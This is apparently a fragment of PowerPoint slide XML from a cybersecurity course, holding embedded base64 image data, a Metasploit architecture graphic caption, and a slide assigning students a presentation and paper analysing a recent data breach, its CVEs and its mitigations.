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6" name="Picture 2" descr="Metasploit Architecture Info-Graphic">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43DE43C2-8E17-4D65-A371-2EFCB85AC2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3286" y="2054224"/>
            <a:ext cx="7000191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46849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2426" y="457201"/>
            <a:ext cx="8181974" cy="1219200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Project 1 Reminder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41842" y="1219200"/>
            <a:ext cx="8497358" cy="5029200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Discuss a network attack/data breach/cyber incident that has been in the news over the past couple years.  In your presentation, provide the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1.  Outline the systems that were attacked and what the weaknesses were (technical, human, or other).  Include CVE information if applicable.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2.  Identify (if known) the attack tool(s) used in the incident.  If not known, hypothesize what the tool would need to accomplish in order to carry out the attack.  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3.  Discuss what would have prevented or slowed the attack.  If the attack is traced to a CVE, include the published remediation/patch information from the vendor and or mitigation that could be implemented.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This presentation should be about 10-15 minutes, which would have been given in class on March 13.  The presentation should accompany a paper, approximately 5-7 pages in length.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AutoShape 4" descr="data:image/jpeg;base64,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